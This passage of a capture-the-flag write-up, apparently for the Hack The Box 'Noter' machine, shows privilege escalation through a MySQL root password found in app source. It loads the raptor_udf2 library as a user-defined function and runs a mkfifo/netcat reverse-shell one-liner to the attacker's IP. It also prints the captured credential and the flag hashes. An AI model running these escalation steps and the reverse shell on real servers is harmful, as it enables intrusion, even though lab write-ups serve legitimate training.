uid=114(mysql) gid=119(mysql) groups=119(mysql)     
</pre></td></tr></tbody></table></code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td> --><td class="rouge-code"><pre>‚ïî‚ïê‚ïê‚ïê‚ïê‚ïê‚ïê‚ïê‚ïê‚ïê‚ïê‚ï£ MySQL version
mysql  Ver 15.1 Distrib 10.3.32-MariaDB, for debian-linux-gnu (x86_64) using readline 
5.2
MySQL user: root
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Try to write in the temp directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>MariaDB [(none)]&gt; select 1 into OUTFILE '/tmp/1';
ERROR 1045 (28000): Access denied for user 'DB_user'@'localhost' (using password: YES)
MariaDB [(none)]&gt; 
</pre></td></tr></tbody></table></code></pre></div></div>
<p>User  <code class="language-plaintext highlighter-rouge">DB_user</code> has no permission.</p>

<p>Reading it the backup file the password for root user.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/‚Ä¶/htb/noter/app/1]
‚îî‚îÄ$ grep -i mysql  app.py    
from flask_mysqldb import MySQL
# Config MySQL
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'Nildogg36'
app.config['MYSQL_DB'] = 'app'
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Access MySQL as root user and creating a file named as <code class="language-plaintext highlighter-rouge">1</code> into temp directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>MariaDB [(none)]&gt; select 1 into OUTFILE '/tmp/1';
ERROR 1086 (HY000): File '/tmp/1' already exists
</pre></td></tr></tbody></table></code></pre></div></div>
<p>The activity is done and the file has been created but the owner is <code class="language-plaintext highlighter-rouge">root</code> user</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td> --><td class="rouge-code"><pre>svc@noter:/tmp$ ls -la
total 904
drwxrwxrwt 17 root root   4096 Sep  6 11:00 .
drwxr-xr-x 19 root root   4096 May  2 23:05 ..
-rw-r--r--  1 root root      2 Sep  6 09:15 1
</pre></td></tr></tbody></table></code></pre></div></div>
<p>This exploit is known and it is called <a href="https://raw.githubusercontent.com/1N3/PrivEsc/master/mysql/raptor_udf2.c">raptor_udf</a> vulnerability.</p>

<p>In hacker‚Äôs machine</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>gcc -g -c raptor_udf2.c
gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
</pre></td></tr></tbody></table></code></pre></div></div>
<p>In victim machine.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td> --><td class="rouge-code"><pre>mysql -u root -p
Enter password:
[...]
mysql&gt; use mysql;
mysql&gt; create table foo(line blob);
mysql&gt; insert into foo values(load_file('/tmp/raptor_udf2.so'));
mysql&gt; select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
mysql&gt; create function do_system returns integer soname 'raptor_udf2.so';
mysql&gt; select * from mysql.func;
mysql&gt; select do_system('id &gt; /tmp/out; chown svc.svc /tmp/out');
myaql&gt; select do_system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.114 1234 &gt;/tmp/f');
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Listen with <code class="language-plaintext highlighter-rouge">netcat</code>  then you will get <code class="language-plaintext highlighter-rouge">root</code> shell.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td> --><td class="rouge-code"><pre>‚îå‚îÄ‚îÄ(egovridc„âøegovridc)-[~/‚Ä¶/htb/noter/app/www2]
‚îî‚îÄ$ nc -nlvp 1234          
listening on [any] 1234 ...
connect to [10.10.14.114] from (UNKNOWN) [10.10.11.160] 51034
/bin/sh: 0: can't access tty; job control turned off
# cat /root/root.txt
aa818f33d1e46c86a0f7c47e4fec6ae7
# cd /
# cd home
# ls
svc
# cd svc
# cat user.txt
4f8107910aaa90612a2828900d0f75ad
</pre></td></tr></tbody></table></code></pre></div></div>
<p>The End.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre>Mungu nisaidie
</pre></td></tr></tbody></table></code></pre></div></div>
:ET